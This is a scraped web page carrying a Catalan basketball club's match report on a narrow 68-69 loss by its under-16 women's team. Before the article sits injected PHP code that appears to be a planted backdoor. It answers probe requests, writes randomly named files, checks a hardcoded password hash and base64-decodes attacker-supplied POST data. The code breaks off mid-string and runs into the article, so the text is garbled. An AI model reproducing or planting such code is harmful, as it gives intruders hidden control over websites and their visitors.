function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 A comet massa errades i encaixa la segona derrota seguida, aquest cop contra el CB Samà (68-69) - Tgn Bàsquet Club -

El cadet femení 04 A comet massa errades i encaixa la segona derrota seguida, aquest cop contra el CB Samà (68-69)

Updated: gener 23, 2019

El cadet femení 04 A va desaprofitar el bon joc que va fer durant molts minuts del partit i va encaixar la segona derrota seguida. El conjunt que entrena Albert del Rey va sortir prou bé, amb una bona defensa i jugant amb encert en atac (26-12 1Q). El CB Samà, però, va millorar la defensa en el segon període i es va situar a només un punt però dos triples del TGN Bàsquet al llindar del descans van deixar el marcador en 40-33. En el tercer quart, les visitants van remuntar a còpia de triples (9 en tot el partit) i les liles van voler imitar-les, sense encert (tot i que en van encistellar 7 durant tot el matx). L’acceleració final del TGN Bàsquet va permetre un petit avantatge abans d’afrontar els últims deu minuts (55-51).

En l’últim període les locals van tenir 11 punts d’avantatge però el van dilapidar per culpa de la reacció visitant que es va situar un punt per sobre a 14 segons del final. El TGN Bàsquet va tenir l’últim tir després d’una jugada assajada però va fallar la safata a cistella i el triple posterior.